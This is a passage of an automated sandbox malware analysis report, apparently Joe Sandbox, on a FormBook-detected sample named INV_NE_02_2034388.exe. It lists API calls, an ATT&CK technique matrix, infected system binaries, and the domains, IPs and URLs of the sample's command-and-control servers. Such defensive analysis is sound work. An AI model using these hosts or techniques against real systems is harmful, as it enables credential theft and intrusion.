          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004048D7
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00464C53 mouse_event,0_2_00464C53
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\INV_NE_02_2034388.exe"Jump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00457CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00457CAF
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0045874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0045874B
          Source: INV_NE_02_2034388.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: INV_NE_02_2034388.exeBinary or memory string: Shell_TrayWnd
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0042862B cpuid 0_2_0042862B
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\AppVClient.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TST256E.tmp VolumeInformationJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TST256F.tmp VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00434E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00434E87
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00441E06 GetUserNameW,0_2_00441E06
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00433F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00433F3A
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004049A0

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 17.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000011.00000002.1702591892.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.1704054953.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: INV_NE_02_2034388.exeBinary or memory string: WIN_81
          Source: INV_NE_02_2034388.exeBinary or memory string: WIN_XP
          Source: INV_NE_02_2034388.exeBinary or memory string: WIN_XPe
          Source: INV_NE_02_2034388.exeBinary or memory string: WIN_VISTA
          Source: INV_NE_02_2034388.exeBinary or memory string: WIN_7
          Source: INV_NE_02_2034388.exeBinary or memory string: WIN_8
          Source: INV_NE_02_2034388.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 17.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000011.00000002.1702591892.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.1704054953.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00476283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00476283
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00476747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476747

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure2
          Valid Accounts          		3
          Native API          		2
          LSASS Driver          		1
          Exploitation for Privilege Escalation          		1
          Disable or Modify Tools          		21
          Input Capture          		2
          System Time Discovery          		1
          Taint Shared Content          		1
          Archive Collected Data          		1
          Ingress Tool Transfer          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts2
          Service Execution          		1
          DLL Side-Loading          		1
          Abuse Elevation Control Mechanism          		1
          Deobfuscate/Decode Files or Information          		LSASS Memory1
          Account Discovery          		Remote Desktop Protocol21
          Input Capture          		1
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAt2
          Valid Accounts          		2
          LSASS Driver          		1
          Abuse Elevation Control Mechanism          		Security Account Manager1
          File and Directory Discovery          		SMB/Windows Admin Shares3
          Clipboard Data          		2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCron1
          Windows Service          		1
          DLL Side-Loading          		3
          Obfuscated Files or Information          		NTDS125
          System Information Discovery          		Distributed Component Object ModelInput Capture12
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
          Valid Accounts          		1
          Software Packing          		LSA Secrets251
          Security Software Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts21
          Access Token Manipulation          		1
          Timestomp          		Cached Domain Credentials2
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
          Windows Service          		1
          DLL Side-Loading          		DCSync3
          Process Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job212
          Process Injection          		222
          Masquerading          		Proc Filesystem1
          Application Window Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
          Valid Accounts          		/etc/passwd and /etc/shadow1
          System Owner/User Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron2
          Virtualization/Sandbox Evasion          		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd21
          Access Token Manipulation          		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
          Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task212
          Process Injection          		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1574347 Sample: INV_NE_02_2034388.exe Startdate: 13/12/2024 Architecture: WINDOWS Score: 100 28 zlenh.biz 2->28 30 uhxqin.biz 2->30 32 5 other IPs or domains 2->32 38 Suricata IDS alerts for network traffic 2->38 40 Antivirus detection for URL or domain 2->40 42 Antivirus detection for dropped file 2->42 44 8 other signatures 2->44 7 INV_NE_02_2034388.exe 3 2->7         started        12 AppVClient.exe 1 2->12         started        14 FXSSVC.exe 15 4 2->14         started        16 7 other processes 2->16 signatures3 process4 dnsIp5 34 ssbzmoy.biz 18.141.10.107, 49702, 49703, 49738 AMAZON-02US United States 7->34 36 pywolwnvd.biz 54.244.188.177, 49700, 49701, 49705 AMAZON-02US United States 7->36 20 C:\Windows\System32\msdtc.exe, PE32+ 7->20 dropped 22 C:\Windows\System32\alg.exe, PE32+ 7->22 dropped 24 C:\Windows\System32\FXSSVC.exe, PE32+ 7->24 dropped 26 6 other malicious files 7->26 dropped 46 Binary is likely a compiled AutoIt script file 7->46 48 Writes to foreign memory regions 7->48 50 Maps a DLL or memory area into another process 7->50 62 3 other signatures 7->62 18 svchost.exe 7->18         started        52 Antivirus detection for dropped file 12->52 54 Creates files in the system32 config directory 12->54 56 Machine Learning detection for dropped file 12->56 58 Contains functionality to behave differently if execute on a Russian/Kazak computer 12->58 60 Found direct / indirect Syscall (likely to bypass EDR) 16->60 file6 signatures7 process8

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          INV_NE_02_2034388.exe82%ReversingLabsWin32.Virus.Expiro
          INV_NE_02_2034388.exe100%AviraW32/Infector.Gen
          INV_NE_02_2034388.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Infector.Gen
          C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe100%AviraW32/Infector.Gen
          C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe100%AviraW32/Infector.Gen
          C:\Windows\System32\AppVClient.exe100%AviraW32/Infector.Gen
          C:\Windows\System32\msdtc.exe100%AviraW32/Infector.Gen
          C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe100%AviraW32/Infector.Gen
          C:\Windows\System32\FXSSVC.exe100%AviraW32/Infector.Gen
          C:\Windows\System32\alg.exe100%AviraW32/Infector.Gen
          C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe100%AviraW32/Infector.Gen
          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe100%Joe Sandbox ML
          C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe100%Joe Sandbox ML
          C:\Windows\System32\AppVClient.exe100%Joe Sandbox ML
          C:\Windows\System32\msdtc.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe100%Joe Sandbox ML
          C:\Windows\System32\FXSSVC.exe100%Joe Sandbox ML
          C:\Windows\System32\alg.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe100%Joe Sandbox ML

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://54.244.188.177/G100%Avira URL Cloudphishing
          http://18.141.10.107/Oeh0%Avira URL Cloudsafe
          http://54.244.188.177/wtafuenc0%Avira URL Cloudsafe
          http://54.244.188.177/f100%Avira URL Cloudphishing
          http://54.244.188.177/9N0%Avira URL Cloudsafe
          http://18.141.10.107/b0%Avira URL Cloudsafe
          http://54.244.188.177/wtafuencqgdxd0%Avira URL Cloudsafe
          http://18.141.10.107/amnlbtdctisruxvs0%Avira URL Cloudsafe
          http://54.244.188.177/wtafuencqgdxds0%Avira URL Cloudsafe
          http://54.244.188.177/50%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          cvgrf.biz
          		54.244.188.177
          		truefalse
            		high
            ssbzmoy.biz
            		18.141.10.107
            		truefalse
              		high
              fwiwk.biz
              		172.234.222.138
              		truefalse
                		high
                pywolwnvd.biz
                		54.244.188.177
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://ssbzmoy.biz/wibawwpifalse
                    		high
                    http://vcddkls.biz/xfalse
                      		high
                      http://pywolwnvd.biz/trlioiljoillllwqfalse
                        		high
                        http://knjghuig.biz/btfxfalse
                          		high
                          http://ssbzmoy.biz/amnlbtdctisruxvsfalse
                            		high
                            http://cvgrf.biz/mddjrljmhfalse
                              		high
                              http://pywolwnvd.biz/wtafuencqgdxdfalse
                                		high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://54.244.188.177/5INV_NE_02_2034388.exe, 00000000.00000002.1341516970.0000000000C9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://18.141.10.107/bINV_NE_02_2034388.exe, 00000000.00000002.1341516970.0000000000CB2000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilithelevation_service.exe.0.drfalse
                                  		high
                                  http://18.141.10.107/OehINV_NE_02_2034388.exe, 00000000.00000002.1341299019.0000000000C58000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://18.141.10.107/amnlbtdctisruxvsINV_NE_02_2034388.exe, 00000000.00000002.1341516970.0000000000CB2000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000002.1341299019.0000000000C58000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://54.244.188.177/GINV_NE_02_2034388.exe, 00000000.00000003.1307700922.0000000000CB2000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1314358242.0000000000CB2000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: phishing
                                  		unknown
                                  http://54.244.188.177/fINV_NE_02_2034388.exe, 00000000.00000002.1341516970.0000000000C9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: phishing
                                  		unknown
                                  http://54.244.188.177/wtafuencqgdxdsINV_NE_02_2034388.exe, 00000000.00000002.1342241605.0000000000D6F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://ssbzmoy.biz/SgLINV_NE_02_2034388.exe, 00000000.00000002.1341299019.0000000000C58000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://54.244.188.177/wtafuencqgdxdINV_NE_02_2034388.exe, 00000000.00000003.1292338634.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1286250862.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1296335740.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1288005450.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1287564151.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1297197458.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1307257706.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1285212644.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1296483664.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1301284711.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000002.1342241605.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1284963561.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1296799474.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1285623478.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://54.244.188.177/9NINV_NE_02_2034388.exe, 00000000.00000002.1341516970.0000000000C9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffelevation_service.exe.0.drfalse
                                      		high
                                      http://18.141.10.107/INV_NE_02_2034388.exe, 00000000.00000002.1341516970.0000000000CB2000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://54.244.188.177/wtafuencINV_NE_02_2034388.exe, 00000000.00000003.1313746685.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000002.1343295812.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        54.244.188.177
                                        		cvgrf.bizUnited States
                                        		16509AMAZON-02USfalse
                                        18.141.10.107
                                        		ssbzmoy.bizUnited States
                                        		16509AMAZON-02USfalse

                                        General Information

                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1574347
                                        Start date and time:2024-12-13 08:56:45 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 8m 30s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:20
                                        Number of new started drivers analysed:3
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:INV_NE_02_2034388.exe
                                        Detection:MAL
                                        Classification:mal100.spre.troj.expl.evad.winEXE@9/14@7/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 65%
                                        • Number of executed functions: 61
                                        • Number of non-executed functions: 252
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, DiagnosticsHub.StandardCollector.Service.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                                        • Excluded domains from analysis (whitelisted): przvgke.biz, zlenh.biz, otelrules.azureedge.net, slscr.update.microsoft.com, knjghuig.biz, vjaxhpbji.biz, ctldl.windowsupdate.com, ifsaia.biz, uhxqin.biz, time.windows.com, fe3cr.delivery.mp.microsoft.com, ww12.przvgke.biz, ww99.przvgke.biz, lpuegx.biz, saytjshyf.biz, xlfhhhm.biz, vcddkls.biz, npukfztj.biz, anpmnmxo.biz
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • VT rate limit hit for: INV_NE_02_2034388.exe

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        02:57:44API Interceptor2x Sleep call for process: INV_NE_02_2034388.exe modified
                                        04:21:33API Interceptor3x Sleep call for process: svchost.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        54.244.188.177Shipment Notification.exeGet hashmaliciousFormBookBrowse
                                        • cvgrf.biz/pm
                                        HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                        • cvgrf.biz/yfypviummaqwyuq
                                        MA-DS-2024-03 URGENT.exeGet hashmaliciousFormBookBrowse
                                        • pywolwnvd.biz/usxsp
                                        Request for Quotation.exeGet hashmaliciousFormBookBrowse
                                        • cvgrf.biz/iropyruplkan
                                        HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                        • cvgrf.biz/hfsfqfqbrwib
                                        PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                        • cvgrf.biz/npdqgsoqmq
                                        RFQ _ Virtue 054451000085.exeGet hashmaliciousFormBookBrowse
                                        • cvgrf.biz/rtjcy
                                        OgkJOmobY7.exeGet hashmaliciousFormBookBrowse
                                        • pywolwnvd.biz/hemfkj
                                        Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                        • pywolwnvd.biz/nwqf
                                        Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                        • cvgrf.biz/yqmdwhskkjhif
                                        18.141.10.107Shipment Notification.exeGet hashmaliciousFormBookBrowse
                                        • knjghuig.biz/hsyjdjsftfdjf
                                        HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                        • vcddkls.biz/lqpvpf
                                        Request for Quotation.exeGet hashmaliciousFormBookBrowse
                                        • vcddkls.biz/ytpebbldheutao
                                        HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                        • vcddkls.biz/ymdlhl
                                        PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                        • knjghuig.biz/jedofahyn
                                        RFQ _ Virtue 054451000085.exeGet hashmaliciousFormBookBrowse
                                        • vcddkls.biz/gepvpveyhkiwwmj
                                        Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                        • vcddkls.biz/kf
                                        RFQ_PO N89397-GM7287-Order.bat.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                        • ssbzmoy.biz/j
                                        Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                        • ssbzmoy.biz/kokmvod
                                        invoice_96.73.exeGet hashmaliciousFormBookBrowse
                                        • acwjcqqv.biz/tgcwttfqletfhyq

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        fwiwk.bizHSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                        • 172.234.222.143
                                        Request for Quotation.exeGet hashmaliciousFormBookBrowse
                                        • 172.234.222.138
                                        RFQ _ Virtue 054451000085.exeGet hashmaliciousFormBookBrowse
                                        • 172.234.222.143
                                        invoice_96.73.exeGet hashmaliciousFormBookBrowse
                                        • 172.234.222.143
                                        Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                        • 172.234.222.143
                                        C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                        • 172.234.222.138
                                        PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                        • 172.234.222.143
                                        IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                        • 172.234.222.143
                                        cvgrf.bizHSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                        • 54.244.188.177
                                        HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                        • 54.244.188.177
                                        PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                        • 54.244.188.177
                                        Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                        • 54.244.188.177
                                        Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                        • 54.244.188.177
                                        invoice_96.73.exeGet hashmaliciousFormBookBrowse
                                        • 54.244.188.177
                                        Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                        • 54.244.188.177
                                        C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                        • 54.244.188.177
                                        PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                        • 54.244.188.177
                                        ssbzmoy.bizShipment Notification.exeGet hashmaliciousFormBookBrowse
                                        • 18.141.10.107
                                        HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                        • 18.141.10.107
                                        Request for Quotation.exeGet hashmaliciousFormBookBrowse
                                        • 18.141.10.107
                                        HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                        • 18.141.10.107
                                        PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                        • 18.141.10.107
                                        RFQ _ Virtue 054451000085.exeGet hashmaliciousFormBookBrowse
                                        • 18.141.10.107
                                        Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                        • 18.141.10.107
                                        RFQ_PO N89397-GM7287-Order.bat.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                        • 18.141.10.107
                                        Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                        • 18.141.10.107
                                        invoice_96.73.exeGet hashmaliciousFormBookBrowse
                                        • 18.141.10.107
                                        pywolwnvd.bizShipment Notification.exeGet hashmaliciousFormBookBrowse
                                        • 54.244.188.177
                                        HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                        • 54.244.188.177
                                        MA-DS-2024-03 URGENT.exeGet hashmaliciousFormBookBrowse
                                        • 54.244.188.177
                                        Request for Quotation.exeGet hashmaliciousFormBookBrowse
                                        • 54.244.188.177
                                        HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                        • 54.244.188.177
                                        PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                        • 54.244.188.177
                                        RFQ _ Virtue 054451000085.exeGet hashmaliciousFormBookBrowse
                                        • 54.244.188.177
                                        OgkJOmobY7.exeGet hashmaliciousFormBookBrowse
                                        • 54.244.188.177
                                        Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                        • 54.244.188.177

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        AMAZON-02USchos.exeGet hashmaliciousUnknownBrowse
                                        • 45.112.123.126
